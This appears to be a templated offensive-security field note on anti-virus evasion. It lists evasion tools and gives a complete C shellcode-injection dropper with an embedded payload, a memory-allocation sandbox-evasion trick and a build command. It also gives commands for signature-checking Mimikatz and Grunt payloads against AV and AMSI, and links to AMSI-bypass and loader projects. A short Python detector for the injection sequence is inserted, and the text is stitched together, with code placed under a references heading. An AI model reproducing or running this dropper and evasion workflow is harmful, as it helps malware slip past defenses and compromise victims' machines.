
Anti-Virus Evasion Basics

Anti-Virus Evasion Basics is presented here as a field note for offensive security work. The emphasis is on attack surface, validation logic, common failure patterns, operator choices and the public references worth keeping nearby during a live assessment.


Why it matters in practice

Anti-Virus Evasion Basics matters because it shapes how an operator scopes the work, chooses validation steps, prioritizes evidence and explains risk. The point is not to accumulate trivia; it is to understand which control boundary is in play and how that boundary can fail under realistic pressure.

This note keeps anti-virus evasion basics tied to offensive workflow: what to observe, what to prove, what usually goes wrong, and which references remain useful once an assessment moves from planning into active validation.

Primary coverage

The items below mark the main workflows, concepts, tools and validation themes that repeatedly matter when working through anti-virus evasion basics.

  • Phantom-Evasion
  • Veil-Evasion
  • Shellter
  • AV bypass with unicorn.py
  • Unicorn GitHub repository
  • Bypassing AV through custom source code
  • AV evasion with the prometheus.cpp shell workflow
  • AV evasion quick reference
  • prometheus.cpp
  • Windows PowerShell macro code

Selected public references

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>

int main(int argc, char* argv[]) {

  unsigned char payload[] =
    "\x48\x31\xff\x48\xf7\xe7\x65\x48\x8b\x58\x60\x48\x8b\x5b\x18\x48\x8b\x5b\x20\x48\x8b\x1b\x48\x8b\x1b\x48\x8b\x5b\x20\x49\x89\xd8\x8b"
    "\x5b\x3c\x4c\x01\xc3\x48\x31\xc9\x66\x81\xc1\xff\x88\x48\xc1\xe9\x08\x8b\x14\x0b\x4c\x01\xc2\x4d\x31\xd2\x44\x8b\x52\x1c\x4d\x01\xc2"
    "\x4d\x31\xdb\x44\x8b\x5a\x20\x4d\x01\xc3\x4d\x31\xe4\x44\x8b\x62\x24\x4d\x01\xc4\xeb\x32\x5b\x59\x48\x31\xc0\x48\x89\xe2\x51\x48\x8b"
    "\x0c\x24\x48\x31\xff\x41\x8b\x3c\x83\x4c\x01\xc7\x48\x89\xd6\xf3\xa6\x74\x05\x48\xff\xc0\xeb\xe6\x59\x66\x41\x8b\x04\x44\x41\x8b\x04"
    "\x82\x4c\x01\xc0\x53\xc3\x48\x31\xc9\x80\xc1\x07\x48\xb8\x0f\xa8\x96\x91\xba\x87\x9a\x9c\x48\xf7\xd0\x48\xc1\xe8\x08\x50\x51\xe8\xb0"
    "\xff\xff\xff\x49\x89\xc6\x48\x31\xc9\x48\xf7\xe1\x50\x48\xb8\x9c\x9e\x93\x9c\xd1\x9a\x87\x9a\x48\xf7\xd0\x50\x48\x89\xe1\x48\xff\xc2"
    "\x48\x83\xec\x20\x41\xff\xd6";

  HANDLE ph; // handle to the target process
  HANDLE rt; // handle to the remote thread
  PVOID rb;  // buffer allocated inside the target process
  DWORD pid; // target process ID, taken from the command line

  // the original code read argv[1] without checking argc
  if (argc < 2) {
    printf("usage: %s <pid>\n", argv[0]);
    return 1;
  }
  pid = atoi(argv[1]);

  // allocate and zero-fill 100 MB of memory, then release it
  char *mem = (char *) malloc(100000000);
  if (mem == NULL) {
    return 1;
  }
  memset(mem, 0, 100000000);
  free(mem);

  // open the target process with full access
  ph = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
  printf("PID: %lu\n", (unsigned long) pid);
  if (ph == NULL) {
    printf("OpenProcess failed: %lu\n", GetLastError());
    return 1;
  }

  // allocate an executable buffer in the remote process
  rb = VirtualAllocEx(ph, NULL, sizeof(payload), (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);

  // copy the payload into the remote buffer
  WriteProcessMemory(ph, rb, payload, sizeof(payload), NULL);

  // start a new thread in the remote process at the buffer address
  rt = CreateRemoteThread(ph, NULL, 0, (LPTHREAD_START_ROUTINE)rb, NULL, 0, NULL);
  if (rt != NULL) {
    CloseHandle(rt); // the original leaked this handle
  }
  CloseHandle(ph);
  return 0;
}
build:
  x86_64-w64-mingw32-g++ dropper.cpp -o dropper.exe -mconsole -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive
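The dropper above performs the OpenProcess, VirtualAllocEx (PAGE_EXECUTE_READWRITE), WriteProcessMemory, CreateRemoteThread sequence against a PID supplied on the command line. As an added example (not part of the original note or any of the tools it lists), the Python below walks a constructed per-process API trace and flags any caller that completes that exact sequence, in order, against a foreign process with an executable allocation; the trace tuple format and the PIDs are invented for illustration.

```python
from collections import defaultdict

# Constructed sample trace (not real telemetry): (caller_pid, api, target_pid, protection)
TRACE = [
    (4412, "OpenProcess", 1337, None),
    (4412, "VirtualAllocEx", 1337, "PAGE_EXECUTE_READWRITE"),
    (4412, "WriteProcessMemory", 1337, None),
    (4412, "CreateRemoteThread", 1337, None),
    (5120, "OpenProcess", 5120, None),                   # self access: out of scope
    (5120, "VirtualAllocEx", 5120, "PAGE_EXECUTE_READWRITE"),
    (6001, "OpenProcess", 2222, None),                   # full sequence but RW only: not flagged
    (6001, "VirtualAllocEx", 2222, "PAGE_READWRITE"),
    (6001, "WriteProcessMemory", 2222, None),
    (6001, "CreateRemoteThread", 2222, None),
]

# The four calls the dropper makes, in the order it makes them.
STAGES = ("OpenProcess", "VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread")


def find_injections(trace):
    """Return (caller_pid, target_pid) pairs that complete all four stages, in
    order, against a different process, with an executable remote allocation."""
    # (caller, target) -> [index of next expected stage, executable allocation seen]
    progress = defaultdict(lambda: [0, False])
    hits = []
    for caller, api, target, prot in trace:
        if caller == target:
            continue  # a process touching its own memory is not remote injection
        state = progress[(caller, target)]
        if state[0] < len(STAGES) and api == STAGES[state[0]]:
            if api == "VirtualAllocEx":
                state[1] = "EXECUTE" in (prot or "")
            state[0] += 1
            if state[0] == len(STAGES) and state[1]:
                hits.append((caller, target))
    return hits


if __name__ == "__main__":
    for caller, target in find_injections(TRACE):
        print(f"remote-thread injection pattern: pid {caller} -> pid {target}")
```

A real deployment would feed this from process-access and remote-thread telemetry rather than a hand-built list, and would treat the RW-only and self-access cases as lower-severity signals rather than discarding them.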
DefenderCheck.exe PowerUp.ps1
AmsiTrigger_x64.exe -i Invoke-Mimikatz.ps1
ThreatCheck.exe -f Downloads\Grunt.bin -e AMSI
https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell
https://github.com/samratashok/nishang
https://github.com/EmpireProject/Empire/blob/master/data/module_source/code_execution/Invoke-Shellcode.ps1
https://powersploit.readthedocs.io/en/latest/
https://github.com/danielbohannon/Invoke-Obfuscation
https://amsi.fail
https://github.com/TheWover/donut
https://github.com/Flangvik/DLLSideloader
https://github.com/Flangvik/NetLoader
